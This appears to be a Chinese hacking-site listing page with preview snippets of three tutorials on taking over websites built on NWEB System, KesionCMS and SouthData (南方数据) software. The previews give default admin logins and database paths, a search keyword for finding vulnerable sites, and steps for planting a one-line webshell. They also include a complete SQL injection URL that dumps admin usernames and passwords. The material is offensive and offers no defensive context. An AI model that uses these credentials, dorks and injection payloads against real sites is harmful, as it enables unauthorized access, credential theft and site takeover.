-
万博企业网站管理系统(NWEB System)后台拿shell
管理登录:/system/adminlogin.asp ‘管理帐号:admin ‘密 码:admin888 网站数据:/Database/NwebCn_Site.mdb (常规内容数据库) /Database/Bak_NwebCn_Site.mdb (备份内容数据库) /Database/NwebCn_Stat.mdb (常规流量数据库) /Database/Bak_NwebCn_Stat.mdb (备份流量数据库) 常量配置:/Include/Const.asp (如果你更改过数...阅读全文阅读全文
-
KesionCMS后台直接拿shell教程
以前就有人公布过拿shell过程 今天再给大家具体演示一下 KesionCMS V6.5 拿shell! 演示网站:www.xxxx.com 直接打开后台 admin/login.asp 一般默认密码:admin admin888 认证码 8888 下面看我的截图操作: 上面搞完后点击促成生成/1.asp/目录 我们再添加一个静态标签 直接把一句话加上去如图 上面全部搞好后点击保存标签 然后自己添加个自定义页面,名字什么的可以随...阅读全文
-
南方数据网站漏洞
漏洞影响版本 v10.0 v11.0 关键字:inurl:”HomeMarket.asp” 默认后台:/admin 直接爆用户密码: http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’ 拿shell方法貌似有4种: 1、注册用户上传拿shell,这...阅读全文